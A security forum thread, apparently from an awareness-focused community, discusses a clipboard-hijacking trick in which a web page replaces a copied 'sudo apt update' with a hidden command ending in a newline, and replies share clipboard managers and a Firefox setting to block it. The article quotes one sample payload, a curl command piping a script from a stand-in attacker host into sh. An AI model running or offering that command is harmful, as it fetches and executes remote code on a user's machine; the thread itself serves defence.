Don't copy-paste commands from webpages — you can get hacked

Gandalf_The_Grey

Level 59
Thread author
Verified
Helper
Top poster
Content Creator
Well-known
Apr 24, 2016
4,858
Programmers, sysadmins, security researchers, and tech hobbyists copying-pasting commands from web pages into a console or terminal are warned they risk having their system compromised.

A technologist demonstrates a simple trick that'll make you think twice before copying and pasting text from web pages.

Recently, Gabriel Friedlander, founder of security awareness training platform Wizer demonstrated an obvious yet surprising hack that'll make you cautious of copying-pasting commands from web pages.

It isn't unusual for novice and skilled developers alike to copy commonly used commands from a webpage (ahem, StackOverflow) and paste them into their applications, a Windows command prompt or a Linux terminal.

But Friedlander warns a webpage could be covertly replacing the contents of what goes on your clipboard, and what actually ends up being copied to your clipboard would be vastly different from what you had intended to copy.

Worse, without the necessary due diligence, the developer may only realize their mistake after pasting the text, at which point it may be too late.

In a simple proof of concept (PoC) published on his blog, Friedlander asks readers to copy a simple command that most sysadmins and developers would be familiar with:

PoC command to be copy-pasted


Now, paste what you copied from Friedlander's blog into a text box or Notepad, and the result is likely to leave you surprised:

curl http://attacker-domain:8000/shell.sh | sh

Not only do you get a completely different command present on your clipboard, but to make matters worse, it has a newline (or return) character at the end of it.

This means the above example would execute as soon as it's pasted directly into a Linux terminal.

Those pasting the text may have been under the impression they were copying the familiar, innocuous command sudo apt update that is used to fetch updated information on software installed on your system.

But that's not quite what happened.
 
Last edited by a moderator:

wat0114

Level 6
Verified
Well-known
Apr 5, 2021
264
It copies both the harmless entry and malicious test code to my Linux clipboard.

copy-paste.png

This could allow an "audit" of the clipboard contents, then select only the harmless entry, or maybe better yet, find another source for the command(s).

I'm glad Mr.Chip in the comments posted something for Firefox.
dom.event.clipboardevents.enabled //changing to disable seems to prevent that. At least it worked on windows for me.

Works in Linux too. Thanks!
 
Last edited:

Local Host

Level 25
Verified
Top poster
Well-known
Sep 26, 2017
1,428
It copies both the harmless entry and malicious test code to my Linux clipboard.

View attachment 263330

This could allow an "audit" of the clipboard contents, then select only the harmless entry, or maybe better yet, find another source for the command(s).



Works in Linux too. Thanks!
You misunderstand since you checking the clipboard history, the latest entry that will paste and is the security risk.
 

wat0114

Level 6
Verified
Well-known
Apr 5, 2021
264
You misunderstand since you checking the clipboard history, the latest entry that will paste and is the security risk.

No, I would just have to click on the second clipboard entry "sudo apt update", and that one is safe to paste into, for example, the terminal. I tested it and it works. The point is I would "visually audit" the clipboard entries before making the selection, and as long as I'm reasonably observant, I should notice and avoid the unexpected and malicious code entry.

EDIT

just to clarify, I emptied the clipboard before copying the test entry form here:


and two separate entries were revealed in the clipboard; the safe "sudo apt update" one and the malicious test code.
 
Last edited:

BladeRunner2049

New Member
Jan 4, 2022
0
When I simply put control-c and pasted it in the text did not change. That is my go to for when I copy commands although that isn't really a solution in this case.
 

shmu26

Level 85
Verified
Helper
Top poster
Content Creator
Well-known
Jul 3, 2015
8,130
It isn't unusual for novice and skilled developers alike to copy commonly used commands from a webpage (ahem, StackOverflow) and paste them into their applications
This sounds scary. The guy writing your next app might incorporate malicious code into it.
The linux command with automatic "enter" is also scary because you don't even get a chance to see what you pasted before it executes. Does it really work that way?
 

Local Host

Level 25
Verified
Top poster
Well-known
Sep 26, 2017
1,428
This sounds scary. The guy writing your next app might incorporate malicious code into it.
The linux command with automatic "enter" is also scary because you don't even get a chance to see what you pasted before it executes. Does it really work that way?
It can also be done on Windows, but you won't find average users on Windows using CMD.
 
Last edited:

wat0114

Level 6
Verified
Well-known
Apr 5, 2021
264
Just don't paste formatted text directly into a shell/terminal, use a simple text editor to reveil what is hidden

Just for informational purposes, a little test I did earlier:


But the method you and others propose is certainly best practice.
 

SeriousHoax

Level 41
Verified
Top poster
Well-known
Mar 16, 2019
3,085
Windows has a Clipboard function that's disabled by default. One can enable that and check clipboard entries before pasting. There's also third party clipboard apps like Ditto (I use the portable version).
I use both, and they are extremely helpful in many situations as they can contain many entries. Only reason I also use Ditto because Windows's clipboard isn't reboot persistent.
Also, as wat0114 showed, KDE also has a built-in clipboard. That's where I first started to use clipboards.
 

shmu26

Level 85
Verified
Helper
Top poster
Content Creator
Well-known
Jul 3, 2015
8,130
Oh boy, that's what I like about a security forum, every once in a while you get a really juicy new kind of exploit to worry about.
Is this form of attack responsible for any major incidents as far as we know? Probably not.
So let's be careful, but on the other hand, such an attack probably won't come our way.
 

SeriousHoax

Level 41
Verified
Top poster
Well-known
Mar 16, 2019
3,085
I'm glad Mr.Chip in the comments posted something for Firefox.
dom.event.clipboardevents.enabled //changing to disable seems to prevent that. At least it worked on windows for me.
I forgot I was already using this in Firefox. I changed this flag so that I can copy texts from websites which don't let you copy.
So, killing two birds with one stone with this one.